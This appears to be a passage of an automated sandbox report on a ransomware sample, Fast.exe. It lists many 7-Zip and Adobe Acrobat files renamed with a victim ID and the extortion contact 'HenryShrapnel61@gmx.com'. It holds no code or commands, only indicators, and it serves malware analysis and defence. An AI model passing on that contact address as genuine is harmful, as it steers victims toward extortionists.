Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ms.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\nb.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ne.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\nl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\nn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\pa-in.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\pl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ps.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\pt-br.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\pt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ro.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ru.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\si.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sq.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sr-spc.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sr-spl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sv.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sw.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ta.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\tg.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\th.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\tk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\tr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\tt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ug.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\uk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\uz-cyrl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\uz.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\va.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\vi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\yo.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\zh-cn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\zh-tw.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\License.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\readme.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Uninstall.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\A3DUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ACE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_reader_appicon_16.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\LICENSE.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\libEGL.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\libGLESv2.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vk_swiftshader_icd.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\LICENSE.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\libEGL.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\libGLESv2.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\vk_swiftshader_icd.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroDunamis.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Adobe.Acrobat.Dependencies.manifest.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\adobeafp.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeLinguistic.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeXMP.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AGMGPUOptIn.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ahclient.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ANCUtility.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\ownership-hero-image-d.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AXE8SharedExpat.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AXSLE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\BIB.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\BIBUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\manifest.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\nppdf32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_asym.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_base.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_base_non_fips.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_ecc.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRClient.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cryptocme.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cryptocme.sig.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cr_win_client_config.cfg.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DirectInk.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\U.S. FOIA.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\U.S. Privacy Act.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\LocaleDisplayNameMap.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template1.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template2.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template3.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ExtendScript.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\template1.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icucnv58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icucnv67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icudt58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icudt67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icuuc58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icuuc67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\AdobeID.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\DefaultID.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\JP2KLib.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\eula.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
